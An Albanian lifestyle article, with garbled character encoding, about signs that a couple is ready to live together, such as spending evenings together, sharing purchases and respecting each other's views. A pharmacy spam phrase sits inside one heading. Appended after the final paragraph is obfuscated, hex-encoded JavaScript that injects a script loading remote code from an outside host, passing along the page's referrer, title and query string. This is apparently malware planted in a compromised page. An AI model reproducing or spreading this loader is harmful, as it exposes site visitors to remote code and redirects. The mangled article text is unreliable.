9bashkjetesa

A jeni tA� gatshA�m pA�r njA� jetA� tA� pA�rbashkA�t

Lidhur me jetA�n e pA�rbashkA�t duhet menduar mirA� dhe ky assesi nuk guxon tA� jetA� njA� vendim i ngutur. Disa A�ifte jeta e pA�rbashkA�t e krahasojnA� me martesA� dhe njA� hap i tillA� mund tA� ketA� efekt shumA� frikA�sues…

Duhet tA� jeni shumA� tA� kujdesshA�m dhe tA� mos nguteni, por disa shenja tA� caktuara mund tA� ju ndihmojnA� qA� tA� kuptoni se a ka ardhur apo jo koha pA�r jetA� tA� pA�rbashkA�t.

Jeni bashkA� pA�r A�do mbrA�mjeA�
Fakti qA� pA�rpiqeni qA� ta pA�rfundoni mbrA�mjen sA� bashku, A�shtA� shenjA� se i pA�rkushtoheni njA�ri-tjetrit. Jeta e pA�rbashkA�t nuk do tA� thotA� vetA�m fjetje nA� tA� njA�jtin shtrat, por njA� gjA� e tillA� A�shtA� megjithatA� njA� fillim i mirA�.

Investimi i pA�rbashkA�t
Investimi i pA�rbashkA�t, pA�r shembull nA� aparate shtA�piake, mund tA� jetA� njA� test i vA�rtetA� pA�r lidhjen. Ky mund tA� jetA� njA� fillim i mirA� i cili do tA� ju ndihmojA� tA� shihni nA�se me tA� vA�rtetA� jeni tA� gatshA�m t’i ndani tA� gjitha gjA�rat pA�rgjysmA�.

Bisedoni pA�r obligimeA�
Bisedoni me partnerin dhe mA�soni se cili A�shtA� qA�ndrimi i tij ndaj kA�saj. Bisedoni lidhur me ndarjen e obligimeve financiare dhe punA�ve shtA�piake para se tA� vendosni qA� ta merrni njA� hap tA� tillA�.

Respektoni mendimet reciprokeA�
Fakti qA� jetoni nA�n njA� kulm tA� njA�jtA� do tA� thotA� se duhet qA� njA�jtA� tA� merrni pjesA� nA� vendime si tA� rA�ndA�sishme ashtu edhe tA� parA�ndA�sishme. Ia jepni partnerit mundA�sinA� qA� tA� shprehA� mendimin dhe respektojeni njA� gjA� tA� tillA�. Por, duhet tA� keni kujdes qA� tA� mos bA�heni tA� varur nga partneri. Fakti qA� jetoni bashkA� nuk do tA� thotA� se duhet tA� shpA�rfillni miqtA� tuaj.

I ofroni hapA�sirA� njA�ri-tjetritA� cialis online to hk.
NA� rast tA� grindjes duhet t’i ofroni njA�ri-tjetrit hapA�sirA�…TA�rhiquni nA� dhomA� dhe pA�rpiquni qA� tA� qetA�soheni. MosmarrA�veshjet A�shtA� mA� sA� miri tA� zgjidhen me gjakftohtA�si, sepse nA� momentin e grindjes mund tA� thoni edhe gjA�ra tA� cilat nuk i mendoni nA� tA� vA�rtetA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}